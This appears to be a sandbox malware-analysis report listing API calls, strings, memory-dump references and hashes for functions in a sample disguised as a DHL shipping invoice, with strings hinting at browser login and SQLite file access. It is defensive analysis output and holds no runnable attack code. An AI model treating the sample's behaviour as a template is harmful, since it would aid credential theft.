                                                                                                                                                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2802642348-0
                                                                                                                                                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                                                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                                                                                                      • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                                                                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
